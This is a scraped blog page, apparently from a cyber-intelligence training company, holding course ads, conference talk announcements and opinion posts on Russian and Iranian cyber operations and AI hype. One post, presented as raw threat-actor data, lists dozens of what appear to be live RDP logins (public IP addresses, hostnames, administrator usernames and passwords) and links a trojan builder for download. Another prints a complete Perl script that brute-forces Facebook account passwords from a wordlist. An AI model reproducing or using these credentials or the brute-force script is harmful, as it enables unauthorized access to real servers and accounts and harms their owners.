Singapore – Cyber Intelligence Training

Cyber Intel – Brochure and Signup

Cheque: make payable to :
MaitreAllianz PteLtd
Mail to: 3 Queen’s Road, #10-163, Singapore 260003
Bank Transfer: MaitreAllianz PteLtd
United Overseas Bank Limited,
RochorRoad Branch
Account No: 147-3020-918
Swift Code: UOVBSGSG

Payment must be made in Singapore Dollars.
Payment is required within 5 working days on receipt of invoice.
Bookings received less than 14 working days –cash payment only
SUBSTITUTION, CANCELLATION, NO-SHOW, POSTPONEMENT POLICIES, CONTACT DETAILS, and EVENT CONFIRMATION
SUBSTITUTION is allowed up to 7 days before day of event. AdminCharge of S30.00 is required for substitution request received with less than 7 days advance notice.
CANCELLATION must be made in writing. Refunds are computed based on the date of receiving your notice.
Full Refund –28 days or more prior to the event
75% -21 to 27 days notice
50% -20 to 14 days notice
25% -7 to 13 days notice
NO REFUND or credit for 6 days or less notice
NO SHOW, Sick Leave, Urgent BusinessCallor Absent for any reason-the full course fee is due.
If we CANCEL or POSTPONE the event, full refund will be given.
FORCE MAJEURE CLAUSE: We shall assume no liability whatsoever if this event is altered, rescheduled, postponed or canceled due to a fortuitous event, unforeseen occurrence, or any other event that renders performance of this event inadvisable, illegal, impractical or impossible. For purpose of this clause, a fortuitous event shall include but not limited to: an Acts of God; governmental restrictions and / or regulations; war or apparent act of war; terrorism or apparent act of terrorism; disaster; civil disorder, disturbance and / or riots; curtailment, suspension, and/or restriction on transport facilities / means of transportation; any other emergency.
YOUR DETAILS: All details required for registration are mandatory. If you found errors, kindly notify us.
SPEAKER CHANGES: Speakers and topics were confirmed at the time of publishing, however, circumstances beyond the control of the organizers may necessitate substitution, alterations or cancellation of the speakers and/or topics. As such, we reserve the right to alter or modify the advertised speakers and/or topics if necessary. Any substitution or alteration will be reflected on our web page as soon as possible. All delegates or their representative will also be notified as soon as the changes are made.
Tel: 6100 0621
http://www.maitreallianz.com

Course Brochure and Signup

Featured post

Deception, Distortion, Dishonesty: The Real Story Behind the Hype – RSA Conference 2018 – San Francisco

Dr. Khatuna Mshvidobadze

In the summer of 2008, Russia attacked Georgia in the first-ever combined kinetic and cyberwar. Sure, the 1990-1991 Gulf War was dubbed the first information war—the use 226571794ecbc84a4232f3e9a42a7041-480x270of information in war is not new. What was new in 2008 was that Russia employed its cyber arm as an independent operational capability alongside its land, sea and air forces. The targets were critical infrastructure. The strategic objectives were to sap Georgia’s will to resist and to provide cover for Russia’s information campaign to deceive the west into believing that somehow little Georgia was the aggressor.

Operational security was paramount—Moscow had to keep everyone confounded about who was behind the cyber attacks. Just like the kinetic invasion, the cyber attacks were long and well-planned, but Russia did a great job covering its tracks. When the shooting stopped, well-meaning researchers investigated what had happened. However, coming from a profession that focuses on computer screens and a culture unaccustomed to the 2018-04-11_9-18-09kind of deception that is part of everyday Russian life, they foundered.

The attacks led us to Russia. We noted uncanny timing. Western experts were indeed confounded when the trail led to kids and criminals. I have been following that trail ever since. Insight into Russia, all-source intelligence and a keen understanding of denial and deception were needed.

Today, saying that the Russian state employs a network of cybercriminals to do its online dirty work is commonplace. One might just as well pretend not to know the identity of those little green men who seized Crimea. But when I started saying it in 2010, you would not believe the resistance I encountered.

Soon after, I met Jeff Bardin, my professor at Utica College, who became mentor and friend. Jeff brings an extraordinary expertise in all-source intelligence and the ways of denial and deception. At this year’s RSA Conference, it is my privilege to combine with him in a talk entitled Deception, Distortion, Dishonesty: The Real Story Behind the Hype.

Jeff will lead off, analyzing the types of D&D, its various dimensions and some tactics that can be employed online and offline. The planners, he will say, must have clear reasons for utilizing D&D based on their goals. They must define the strategic, operational and tactical goals of deception and the criteria for success.

I will point out that Russians do not see cyber warfare as distinct but regard it as just one tool of information war. Look at 2008. The cyber attacks aimed at hampering the Georgian government’s ability to communicate while Moscow’s propaganda machine painted Russia as the aggrieved party. “Information space opens wide asymmetrical possibilities for reducing the fighting potential of an enemy,” writes Valery Vasilyevich Gerasimov, Chief of the Russian General Staff. It’s a remarkable statement, but nothing new—Russian thinking on information warfare has been consistent since the 1980s.

Now, the Kremlin commands a vast network of online intelligence agencies, scientific organizations, academic institutions, criminals, and trolls. We’ll discuss how Russia deals with enemies, foreign and domestic, cyber players and organization, the growing role of the military, tactics, techniques, procedures and tools, vectors, false flags, troll factories and more. Come join us on Wednesday at the RSA Conference.

KM

Featured post

Coincidences Take A Lot of Planning – RSA Conference 2018 – San Francisco

The RSA Conference is soon upon us! The expectation to see old friends and make new rsa1800008-buckle-up_augacquaintances. The show will once again be great with new technologies displayed, new ideas bantered about, and phrases around AI used inappropriately and about 5-10 years too soon. The parties will crank at night and many will suffer the cocktail flu come the next morning. 40,000 strong is the estimated number for this event! Huge!

کنفرانس RSA 2018  rsa-конференция 2018  2018 RSA 회의  rsa 2018年会议  مؤتمر rsa 2018

But what of the undercurrent that occurs unmentioned every year? Just beneath the surface are a series of activities generated by scores of foreign agents looking to steal information, intellectual property, or gain an upper hand over someone of importance being caught doing illicit things. How many spies will blanket the city and the shop floor armed with various technologies used to extract information? Cyber and physical espionage activities run amuck at such events. This is common and expected. How will you know when your data is being pilfered? Will your hotel room be secure? Are your 2018-04-05_14-43-31mobile devices secure? What data have you given up already? Flight plans, hotel information, email addresses, phone numbers, social media data, car rental information, events you will attend, arrival and departure times, restaurant reservations, meeting information… Do you think your data is not in the wind already? Will a chance encounter lead to unexpected information sharing? Is the person next to you at the bar there just by coincidence?

All questions you should consider. All questions that are usually forgotten or ignored.

BEHIND ALL COINCIDENCES THERE IS A PLAN, AND BEHIND ALL PLANS THERE IS A COINCIDENCE – Malnar

I12149464887

Featured post

Online – Cyber Intelligence Tradecraft Certification – April 28, 2018

 

This 8-week online course begins on Saturday April 28, 2018 at 5PM US Mountain Time ending on Saturday June 23, 2018 at 5PM US Mountain Time.
http://www.planetreg.com/T71ONLINETRAINING
The online courses are instructor video and audio recorded with periodic direct interaction with the instructor via online web meetings. The instructor will have standard office time for question and answer as well as regular access via class email and other messaging options.

Validated and registered students will receive login and preparation information 1 week prior to class start. Prospective students must send an email to osint@treadstone71.com from a corporate account to validate course eligibility before registration. (Corporate accounts are not Gmail, Hotmail, Yahoo, Mail, Hushmail, Protonmail, and the like). Treadstone 71 reserves the right to restrict course registration based upon certain risk factors. 

http://www.prweb.com/releases/2018/02/prweb15246819.htm

Latest student testimonial:
“With my extensive experience working in the Department of Defense on active duty and federal contractor, this training provided industry professionals with a greater perspective for intelligence analysis. The training taught state of the art concepts and applied them to real world scenarios establishing a solid understanding on utilizing these intelligence tradecrafts to effectively predict and prevent cyber actors from exploiting their organizations. Individuals new to the cyber intelligence field or professionals who want to fine tune their skills in the intelligence field should strongly consider this training for any intelligence analyst or security professional.”

Program Outline 

http://www.planetreg.com/T71ONLINETRAINING

  • CYBINT1 – Anonymity and Passive Persona setup, Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT,TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy (Case Study 1)
  • CYBINT2 – Organization, Production, and Structured Analytic Techniques, Adversary Denial and Deception, Use of Techniques, Types of evidence, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates (Case Study 2)
  • CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, Flow into Hunt, Detect, CSIRT,TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience (Case Study 3)
  • CYBINT4 – Case Study 4, Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations
    Lecture, Hands-on, Apprenticeship,in class exercises, student presentations, analytic products, templates, course material—40 CPEsAll Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

http://www.planetreg.com/T71ONLINETRAINING


All students receive 3 books and 50 plus course documents, VPN, and other course material. 
Students who complete the course will be certified as Cyber Intelligence Tradecraft Professional. 40 CPEs awarded for the course. This course is highly specialized following intelligence community tradecraft. You won’t get this at SANS. You won’t get this anywhere but from Treadstone 71. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Course books and manuals will be provided to students upon accepted enrollment. This course follows traditional intelligence community tradecraft. Treadstone 71 has been teaching cyber intelligence courses in various forms for six years. From academic settings and corporate environments to government facilities. Our customers include some of the largest firms in the world many of whom are part of critical infrastructures recognizing the need to learn how to create intelligence (www.treadstone71.com). We support our training with onsite consulting services that teach you how to create a sustainable program aligned to stakeholders. Ultimately, we teach you what most vendors cannot or will not – how to fish for yourself.

Course Fee, Course Lab, and Materials Fee (includes books, templates, structured techniques application, etc.).

This course combines lecture, research, and hands-on team assignments. Students are best served using a PC but a MAC will do (a virtual machine running windows on the Mac is best if you only have a Mac).

How is this course different from the current Treadstone 71 Cyber Intelligence course?

This course provides definitive sections along the intelligence lifecycle that are in-depth. Students are required to demonstrate understanding and use of collection methods using defined targets and target case studies, understanding and applying analytic techniques, when and how to use analytic techniques and analytic types. Students are presented case studies for analysis, required to use tradecraft methods, and provide written reports in standard analytic format. Students are also required to orally present their deliverables to the class. You will leave this course with the tools, methods, and understanding necessary to enhance your intelligence program.

“The Cyber Intelligence Training delivered and created by Jeff Bardin will add rapid returns to both Cyber Intel Analysts, and your Security Operations.  This very thorough class adequately prepares the student for your Cyber Intelligence function.  This class starts with the history of intelligence as a tradecraft and the evolution to the digital corporate world.   Along the way, each student receives quality instruction and hands-on experience with today’s OSINT tools.  This is necessary for anyone new to Cyber Intelligence and complimentary to any Security Operations within your enterprise. This class provides the student with the resources and fundamentals needed to establish cyber intelligence as a force as both a proactive offensive step and a counter intelligence-contributing arm of your larger team.”

“The class was very detail orientated with a strong focus on the work of Cyber threats and how to better secure your assets against potential attacks.  For most scenarios, we went through he had an open source tool, or the link to a paid version, to monitor or prevent the attacks from occurring.  He was able to answer each and every question asked with specific details, and then some.  I would sign up again right away for any other classes offered by Jeff.”

“Fantastic class that gets to the foundational aspects of traditional tradecraft. We studied hard examining recent attack campaigns. The analysis training prepared me forreal world efforts. Have to say this is one of the best classes I have ever taken having taken many from SANS.  SANS does not compare. They are more of a class mill today.  The Treadstone 71 course material is unique, focused, and timely.”

“The Cyber Intelligence training offered by Treadstone71 is definitely an outstanding course and I recommend it for any organization looking to implement an intelligence capability. Jeff Bardin is extremely knowledgeable in the intelligence tradecraft and applies it to the cyber realm in a way that is understandable, exciting to learn and makes it easy to achieve “quick wins” in the organization after completing his class.  Jeff provided the class with a multitude of tools, templates, and documents that can immediately be used by any organization focused on intelligence collection and analysis. Jeff arrived well prepared to teach the course and one of the most impressive aspects of the class was that he presented the material in a way that displayed his personal knowledge and experience in the field rather than relying solely on book material.  We intend to continue leveraging Jeff’s services as we mature our cyber intelligence capability and highly recommend Treadstone71’s services to any organization.”

“This is one of the best, if not the best, Cyber Threat Intelligence training course I’ve attended.”

“This course was excellent. I was concerned coming into it that I would already know all the course material (I have been doing this sort of work for 15 years, specifically the type of work this course covered). As it turns out, it was a good reminder of what I should be doing to improve structure and rigor, and provided good tools, some of which I had not seen before. If I was new to this field or looking for a good insight into how Intelligence should work (i.e.: most of the rest of the class), I believe this would have provided even more value. I have already recommended it to a couple of my former colleagues in this line of business and would happily recommend it for future use by ########.”

Course material is not for resale or commercial use outside the end user license agreement. Course material may not be used for competitive purposes.

NOTE: Organizations sending 3 or more students are eligible for other discounts. Contact Treadstone 71 at osint@treadstone71.com for more information.

NOTE: CORPORATE PURCHASE ORDERS can be arranged. Please contact us at osint@treadstone71.com to begin the process. Payment must be received prior to course start.

You must attend the full class in order to gain access course material and the certification. Certification is granted after completion of course instruction and hands-on application of the concepts in 3 to 4 team exercises. If a student leaves the class prior to course completion, neither the certification is granted nor is the course material covered after the student leaves made available.  Lectures and associated materials posted each day after each lecture. This method supports the student in a just-in-time manner. This method ensures full understanding of the material without discovering course plot lines until the proper time. The course is architected to support a particular process flow and learning method.

Submitting your registration means you agree to the course EULA and all that it entails. Couse EULA
Treadstone 71 reserves the right to cancel the course should we not receive enough registrations.

 www.planetreg.com/T71ONLINETRAINING
 
Registration     Pay by April 15, 2018

Pay by April 15, 2018  $4,499.00
Featured post

Cyber Intelligence Tradecraft Certification

  • Online, Instructor-Led
    niccs

This course provides tradecraft training along the intelligence lifecycle including collection methods, techniques, planning, PIRs, and collection tools and targeting. Intelligence production methods and process flows are covered as well as evidence credibility, reliability, denial and deception, and confidence levels.

Students are required to demonstrate understanding and use structured analytic techniques as well as various types of analysis including synthesis and fusion of data and information into actionable intelligence. The class covers methods of adapting TTPs and IoCs for hunt and detect and interfaces to incident response.

The course includes case studies covering adversary campaign research and analysis, historical trending, and passive adversary collection. Students will be instructed in applying analytic techniques, when and how to use analytic techniques and analytic types. Students are presented several case studies for analysis, required to use tradecraft methods, and provide written reports in standard analytic format will dissemination the reports to stakeholders.

5 day instructor led in person (NOTE: the NICCS site may not be up-to-date)

Learning Objectives

  1. Develop skills in Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy.
  2. Learn Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates.
  3. Define Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, SOPs, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.
  4. Participate in and demonstrate how to Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Argument Mapping.

This course follows the International Association for Intelligence Education Standards for Intelligence Analyst Initial Training.

I. Introduction to Intelligence
II. Critical Thinking
III. Analytic Writing
IV. Creative Thinking
V. Analytic Briefing
VI. Structured Analytic Techniques.
VII. Analytic Issues
VIII. Argument Mapping
IX. Case Studies

Framework Connections

  • Icon that says Analyze with a chart graph depicted
  • Icon that says Collect and Operate with database server depicted
  • Icon that says Oversee and Govern with a magnify glass depicted.
Featured post

Africa – Where Counter-Terrorism and Modernization Meet

One more fascinating/outstanding effort by the new Kansas State Dragon Team. This time we researched the major powers’ use of Drones on bicoastal AOs in Africa. Many interesting conclusions and lots of resources involved. The false flag is counter-terrorism. The real agenda is resources: gold, diamonds, cotton. China continues it “Take and Talk strategy” in Africa and the Spratly Islands back in its home territory of the South China Seas.

We next intend to look at China’s interference with India and Pakistan. The next war will be by Drone proxy – as predicted. Too much UAS  investment by so many big players to leave them dormant.   Or it might be very subtle like disruption of GPS communications or replay of navigation bridge signals on US  naval assets.

REPORT in PDF HERE

  • Team Dragon
  • Kansas State University

ksu

Featured post

Confuser and Oilrig – Iranian Hacks

This is a bit disjointed at this time and is raw data. This is not intelligence, has not been analyzed but does tie directly to Oilrig.

A powerful program to pack your apps. With this program, you can pack programs in C # and VB.Net

Confuser – Confuser program zipped. For download and analysis

a1ir3z4-HK Frequently found on anonysec.org, c-cracking.org, formerly of the Kalli Hack Team (kallihack), http://haraji.8tag.ir

Others in the mix: XVII_Hacker, #XVII_Roman & #BlackErroR1 & #sorblack

BTC BRUTER v.3.0 By UNKNOWN-KILLER

Bitcoin Cracker Performance Test via Telegram: @ a1ir3z4HK @ a1ir3z4_HK_bot
Using temp emails here: http://www.emeil.ir/
Sprinkle the effort with a bit of Russian for flavoring

Cʏʙᴇʀ Cʀᴀᴄᴋɪɴɢ | سایبر کرکینگ

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

182.71.201.2:3389@TECHNOPAK\administrator;p@ssw0rd
150.242.254.98:3389@WINWORLD\administrator;Pass@word1
115.112.155.95:3389@APOLLOHOSPITALS\administrator;P@ssw0rd
221.135.143.132:3389@DMSSERVER\administrator;P@ssw0rd
220.225.210.91:3389@CTL\administrator;P@ssw0rd
45.64.195.147:3389@UNISRV\administrator;P@ssw0rd
125.22.73.198:3389@NAVGGL\administrator;P@ssw0rd
125.22.73.196:3389@NAVGGL\administrator;P@ssw0rd
59.144.162.8:3389@DELLSERVER\administrator;Admin@123
27.54.170.204:3389@DCPLHO\administrator;Admin@123
180.151.71.42:3389@FOURDTECH\administrator;Admin@123
202.47.116.201:3389@JAYAIR\administrator;Admin@123
118.185.53.18:3389@JBBROTHERS\administrator;Admin@123
27.251.117.6:3389@WIN-6T4QFMCPVE8\administrator;Admin123
103.230.152.172:3389@WIN-PMCSC1KVLPH\administrator;admin@123
219.65.58.58:3389@BIOTECH\administrator;admin@123
124.123.99.31:3389@WIN-RJTS2DUSFC1\administrator;admin@123
122.15.47.237:3389@ADMINISTRATOR\administrator;admin@123
125.63.94.107:3389@LAT039010002\administrator;admin@123
103.50.152.53:3389@BIOTECH\administrator;admin@123
117.252.2.69:3389@ADMINISTRATOR\administrator;admin@123
119.226.187.124:3389@WINDOWS-LJLRPML\administrator;admin@123
125.21.48.42:3389@WINDOWS-LJLRPML\administrator;admin@123
223.30.104.27:3389@WIN-ANRHQC2VF3Q\administrator;admin@123
125.20.83.199:3389@DSKE-1\administrator;admin@123
223.30.126.218:3389@CKHO\administrator;admin@123
59.90.244.200:3389@TEEPARAM-SERVER\administrator;Passw0rd1
14.102.15.38:3389@LAB01\administrator;password@123
124.124.70.194:3389@BRIGADEGROUP\administrator;password@123
220.227.9.77:3389@SCINDIASCHOOL\administrator;password@123
122.200.19.58:3389@ASHTE-RFID\administrator;P@ssw0rd@123
61.12.1.3:3389@WINDOWS-CYMSTZH\administrator;password@1234
182.74.185.140:3389@BIBAAPPARELS\administrator;abc@123
180.211.99.2:3389@GCPL\administrator;
112.196.8.202:3389@LIBRARYSERVER\administrator;
118.185.4.242:3389@SRI01\administrator;
Capture
Beast Trojan Builder – (change to .rar to unzip) Use at own risk.
57c4d9a0-63da-46d3-9e16-b720d27b0f6a
Featured post

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

 

 

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

 

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com&#8221;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

 

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

 

Featured post

Treadstone 71 Selected to Deliver at the RSA Conference 2018 San Francisco

Foundations for a Strong Intelligence Program
April 18, 9AM-11AM RSA Conference
This Lab will explore key aspects of building a strong and long-lasting cyberthreat intelligence program. We’ll review methods of threat intelligence platform selection and bake-off techniques as well as cover stakeholder analysis and priority intelligence requirements. Additionally, we’ll practice collection planning and mission management as well as how to establish effective reporting and dissemination capabilities.

rsa2018
Cyber CounterIntelligence – Deception, Distortion, Dishonesty
April 18, 1:45PM-2:30PM RSA Conference
Deception, distortion, dishonesty are core to social media postings. Our adversaries use these methods concocting stories that create illusions that are meant to leave us divided. The talk will cover methods of countering their messaging while applying these tactics to protect your own organization and brand. Moving from intelligence to counterintelligence is the natural next step in our evolution.

Featured post

Plague of the Cyber RATS

How a toxic computer code delivered by ‘Remote Access Trojans’ is an invisible army able to take over a petrochemical plant and blow it to pieces

Ironically, said Bardin, it was Stuxnet that led Iran to enhance its offensive capability: ‘If Stuxnet had happened to the US or UK, it would have been seen as an act of war. In Iran, it made them invest heavily in offensive cyber operations.’

He revealed that 18 per cent of Iranian university students are studying computer science – a cyber warfare talent pool.

http://www.dailymail.co.uk/news/article-5404055/How-hackers-using-RAT-malware-seized-petrochemical-site.html

No guns. No bombs. No conventional weapons of any kind. An invisible army able take over a petrochemical plant like this and blow it to pieces. That’s the power of a toxic computer code delivered by RATs – ‘Remote Access Trojans’ – that’s making UK security experts VERY nervous indeed

‘Fixing this takes political will, and business is always pushing back, because good cyber security adds costs,’ said Bardin. ‘Ultimately, something is going to blow up.’

Featured post

Anomali and Treadstone 71 Announce Platform and Training Partnership

Provider of threat management and collaboration solutions to provide cybersecurity students and professionals access to powerful cyberintelligence software

REDWOOD CITY, Calif.–(BUSINESS WIRE)–Anomali, the leading provider of threat management and collaboration solutions, and Treadstone 71, which delivers cyber intelligence, counterintelligence, infiltration, clandestine cyber HUMINT, OSINT training and analysis, today announced a partnership to deliver cyber and threat intelligence information and training. Anomali is providing opt-in ThreatStream access to all Treadstone 71 students as part of the Treadstone 71 Cyber Intelligence Training package.

Featured post

Artificial intelligence is surely one thing – artificially defined and erroneously articulated

As I look at the threat intelligence platforms and other IT solutions claiming to be artificial intelligence platforms, I can only surmise that this coincidence is in lockstep with the dumbing down of America. “Artificial intelligence is intelligence displayed by machines, in contrast with the natural intelligence displayed by humans and other animals,” as defined by Wikipedia surmises that computer systems must display the same level of intelligence as humans or even animals. If this is the case and based on what I have witnessed over the past few years in the United States, I am forced to agree with this definition. Therefore, I would agree with the Cylance’s and Crowdstrike’s of the world who claim to have artificial intelligence within their platforms. I would just be suspect that the platform IQ is hovering well below that of a Gumpian character or someone who pattern matches a rhino and lion to invalidate dementia. Should we try the definition again? ”A computer can beat the world chess champion and understand voice commands on your smartphone, but real artificial intelligence has yet to arrive,” as per the BBC. And that computer is Watson, not a few VMs strung together amongst some CPUs. That seems much more in line with the technical capabilities. “The experts predict that AI will outperform humans in the next 10 years in tasks such as translating languages (by 2024), writing high school essays (by 2026), and driving trucks (by 2027),” according to a May 2017 MIT Tech Review article. That is hardly true AI. If you ask several security vendors (wait for RSA 2018 – San Francisco), we have AI now and it is destroying adversary malware and hackers.

“We also struggle to understand what’s meant by intelligence. For example, AI experts consistently underestimated the ability of AI to play Go. Many thought, in 2015, it would take until 2027. In the end, it took two years, not twelve. But does that mean AI is any closer to being able to write the Great American Novel, say? Does it mean it is any closer to conceptually understanding the world around it? Does it mean that it’s any closer to human-level intelligence?” – By Thomas Hornigold – Jan 01, 2018

Before you buy the next new and shining offering that claims to be AI, have someone give you a gentle cuff side the head as a wakeup call to the noise that is being presented. These are at best incremental gains doing battle against a much more devious and faster adversary. Magazines are touting AI, companies are touting AI, and you are buying snake oil. Not much has changed over the years. This is AI snake oil based in a failed premise of see-detect-and arrest. A losing proposition and you are paying a premium to fail for after-the-fact ‘prevention.’ Wake up CISOs. Demand better.

Featured post

واکسنی به اسم فیلترینگ

💉 واکسنی به اسم فیلترینگ

